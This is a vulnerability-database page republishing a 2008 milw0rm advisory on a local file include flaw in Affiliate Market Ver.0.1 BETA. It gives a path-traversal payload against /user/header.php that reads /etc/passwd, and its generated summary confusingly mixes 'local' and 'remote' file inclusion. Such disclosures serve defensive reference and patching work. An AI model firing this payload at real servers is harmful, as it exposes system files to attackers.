header-logo
Suggest Exploit
vendor:
Affiliate Market
by:
milw0rm.com
7.5
CVSS
HIGH
Local File Include
22
CWE
Product Name: Affiliate Market
Affected Version From: Ver.0.1 BETA
Affected Version To: Ver.0.1 BETA
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Affiliate Market Ver.0.1 BETA (language) Local File Include Vulnerability

Affiliate Market Ver.0.1 BETA (language) is vulnerable to a Local File Include vulnerability. This vulnerability allows an attacker to include a file from a remote server that is accessible by the web server. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters (../). This will allow the attacker to include a remote file from the web server. The vulnerable code can be found in the /user/header.php file. An example of the vulnerable code is: /user/header.php?language=../../../../../../../../../../../etc/passwd

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated. This will prevent an attacker from including malicious files from the web server.
Source

Exploit-DB raw data:

Affiliate Market Ver.0.1 BETA (language) Local File Include Vulnerability
http://kent.dl.sourceforge.net/sourceforge/affmarket/affmarket.30.03.07.zip
/user/header.php?language=../../../../../../../../../../../etc/passwd
I'm tryagi ..^|-

# milw0rm.com [2008-02-13]

Navigation

Suggest Exploit

Services By CQR